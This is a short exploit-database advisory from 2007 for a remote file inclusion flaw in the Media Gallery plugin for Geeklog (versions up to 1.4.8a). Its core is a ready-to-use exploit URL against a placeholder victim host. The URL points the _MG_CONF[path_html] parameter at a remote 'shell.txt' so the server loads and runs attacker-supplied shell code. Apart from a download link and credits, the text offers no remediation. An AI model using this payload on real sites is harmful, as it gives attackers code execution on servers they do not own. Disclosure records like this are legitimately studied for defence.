id: 1875
date: 05/13/2007
title: Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

=======================================================================
Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability
=======================================================================



#Media Gallery =>v1.4 Remote file inclusion

#Download script : http://switch.dl.sourceforge.net/sourceforge/mediagallery/mediagallery-1.4.6-1.3.11.tar.gz

#Thanks Str0ke

#Exploit :

#http://victime.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?

#Discovered by ThE TiGeR



#  0day.today [2023-03-22]  #